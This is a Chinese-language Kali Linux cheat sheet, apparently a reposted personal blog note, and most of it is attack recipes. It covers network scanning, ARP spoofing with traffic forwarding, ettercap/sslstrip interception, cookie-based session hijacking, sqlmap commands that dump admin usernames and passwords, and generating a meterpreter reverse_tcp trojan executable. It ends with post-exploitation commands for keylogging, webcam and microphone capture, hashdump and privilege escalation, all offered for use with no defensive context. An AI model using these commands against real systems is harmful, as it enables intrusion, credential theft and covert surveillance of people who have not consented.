kali帮助

kali help

Attention

这是我N久前学习kali时自己打的东西,不保证没有纰漏啊……

网址

kali:
https://www.herojd.com/forum.php?mod=viewthread&tid=34

网站破解:
目录:
https://www.herojd.com/forum.php?gid=50

Burpsuite:
https://www.herojd.com/forum.php?mod=viewthread&tid=25
https://www.herojd.com/forum.php?mod=viewthread&tid=24

部分常用指令

ls

显示目录(原dir)

rm

删除(就是remove嘛)

进入目录(这个和cmd一样)

cd

返回上级目录(在Windows中是cd/或cd..)

ifconfig

查看内网IP

cat

查看内容

vim 文件名
文档编辑器,不存在就新建
不保存,退出

  1. 按下ESC
  2. 按下shift+:
  3. 输入q!(不保存,退出的意思)

编辑

  1. 按i键
  2. 按ESC
  3. 按shift+:
  4. 按wq(保存,退出)

查找IP

fping -a -g 目标IP列表
-a显示是"活着"的目标
-b n 大量 ping 数据要发送,以字节为单位 (默认 56)
-f 文件读取列表中的目标是从一个文件 (-意味着 stdin) (仅当没有-g 指定)
-g 生成目标列表 (仅当没有-f 指定)
(指定的开始和结束 IP 在目标列表中,或提供一个 IP 子网掩码)
(如: fping -a -g 192.168.1.0 192.168.1.255 或 fping -a -g 192.168.1.0/24)

nmap -Ss 目标ip
查看目标IP开放端口
nmap -sP 192.168.0.*
把你网段里的所有主机都找出来

nmap -O 目标ip

断网攻击+流量转发

arpspoof -i 网卡 -t 目标IP 我的网关
使目标IP进入我的网卡

echo 1 >/proc/sys/net/ipv4/ip_forward
进行IP流量转发(意为把1赋给一个文件)

driftnet -i 网卡
获取经过本机网卡的图片

欺骗攻击(http/https)

ettercap
欺骗工具,DNS欺骗,流量嗅探等
ettercap -Tq -i 网卡
启动文本模式欺骗http
ps:!ettercap会执行上一次的ettercap执行代码
ps: ettercap会自动转发,无需再echo 1 >/proc/sys/net/ipv4/ip_forward,别转发两次

sslstrip
把https的链接还原成http(但是易出现证书错误,也有概率抓不到包)

最后,若不是明文,就到百度上去URL解码

会话劫持

利用cookies,直接登录。
wireshark
抓包
方法一
1、输入wireshark,选择网卡开始
2、等待目标IP登陆,等待网络延迟
3、当出现大量DNS记录后,点红色小方框暂停
4、file->save as(另存为)桌面->格式选择pcap(可能是第二个)现在可以关闭欺骗
5、终端进入到桌面,输入ferret指令
6、使用hamster指令
7、改代理服务器:浏览器的Edit->Preferences->Advanced->选Manual proxy configuration->修改IP与端口
8、访问第五行的IP:端口
9、会出现被欺骗IP的链接,点击。若未出现,则是没抓到包
10、在左边一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
PS:优先找全域名的哟(^U^)ノ~
方法二
1、无需欺骗,输入ferret -i 网卡可获取所有网段IP
2、同时,删除hamster.txt,再同时使用hamster指令
3、改代理服务器
4、打开网页后,选adapters,输入网卡,点Submit Query
5、在对方浏览网页是,网页会实时更新
6、若无用,重新执行ferret和hamster指令,并等待ferret指令执行完毕
7、在左边一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
PS:优先找全域名的哟(^U^)ノ~
方法三(关闭代理!!!)
1、直接打开cookies.jar(关闭代理!!!)
2、选择网卡开始
3、这时就已经在实时更新。当出现蓝色字体时,过一会点开
4、在中间一栏查找可能是登录的网址(要有耐心哟(^U^)ノ~)
5、觉得是可能的,就选中,点击Lead Demaln Cookies
6、会弹出一个浏览器窗口,耐心的等它加载(做一个黑客就是要有耐心!)

ferret
重新生成抓包后的文件
ferret -r 文件名.pcap
会把原来抓包的pcap文件重新生成为txt文件
ferret -i
网卡可获取所有网段IP
hamster
重放流量
直接输入,后把http端口改成3/4行括号里的端口,并且访问第五行的IP:端口

sqlmap渗透注sql

ASP网站

sqlmap -u 网址
检测是否存在注入并返回数据库的类型

sqlmap -u 网址 --table
猜解所有表名(耐性等待)

sqlmap -u 网址 --columns -T"user"
(columns)
猜列名
(user)
根据经验确定这是用户表

PHP网站

sqlmap -u 网址(加协议和双引号)
检测

sqlmap -u 网址(加协议和双引号) --is-dba
检测网站是否为dba权限

sqlmap -u 网址(加协议和双引号) --dbs
列出所有数据库

sqlmap -u 网址(加协议和双引号) --dba
列出所有数据库

sqlmap -u 网址(加协议和双引号) --current-db
查找自己的数据库

sqlmap -u 网址(加协议和双引号) --table-D"数据库名"
查询所有表名(根据数据库)

sqlmap -u 网址(加协议和双引号) --columns -T "上一步中可能是管理员的表名"-D"数据库名"
查询所有列

sqlmap -u 网址(加协议和双引号) --dump -C "username,password" -T "上一步中可能是管理员的表名"-D"数据库名"
查询所有列

Cookies注入
或许,在某些站的网址后加入and 1=2会有错误提示,那就是这个网站可用Cookies注入了
先尝试常规注入
sqlmap -u 网址(加协议和双引号)
检测(一般没用,会出现黄色的错误)

cookies检测
sqlmap -u 网址(加协议和双引号且不要id = ***) --cookies "id参数" --level 2
如果是cookies注入,就要把等级提升为level 2

sqlmap -u 网址(加协议和双引号且不要id = ***) --tables --cookies "id参数" --level 2
猜解(耐性等待哟(^U^)ノ~!)

msfconsole

输入即可启动(速度较慢)

show
显示所有漏洞

use exploit/windows/smb/ms08

msfpayload windows/meterpreter/reverse_tcp LHOST=本机ip LPORT=高端口 X > test.exe
生成木马

exploit/multi/handler
使用handler模块

set PAYLOAD windows/meterpreter/reverse_tcp
使用shellcode

set LHOST=本机ip
set LPORT=高端口
设置。。。

等待目标打开

sysinfo
目标主机信息

shell
获取目标主机shell

因为木马随时可能被结束进程
所以要注入进程

ps
查看目标主机进程

migrate 进程ID
注入进程(常用explorer.exe)

run vnc
远程桌面

文件管理
Download
下载文件
Edit
编辑文件
cat
查看文件
cd
切换目录
mkdir
创建文件
mv
移动文件
rm
删除文件
upload
上传文件
rmdir
删除文件夹

网络及系统操作
Arp
查看arp缓冲表
ifconfip
IP
Getproxy
获得代理
Netstat
查看端口连接
kill
杀死进程
ps
查看进程
reboot
重启电脑
reg
修改注册表
shell
获得shell
shutdown
关机
sysinfo
主机信息

用户操作及其他功能
enumedesktops
窗体
keyscan_start
键盘记录开始
keyscan_dump
键盘记录下载
keyscan_stop
键盘记录结束
uictl 关闭desable或开启enable mouse或keyboard
获得鼠标键盘控制权
record_mic
音频录制
webcan_chat
查看摄像头接口
webcan_list
查看摄像头列表
webcan_stream
摄像头获取
getsystem
获得高权限
hashdump
下载hash表

原文地址:https://www.cnblogs.com/send-off-a-friend/p/12230167.html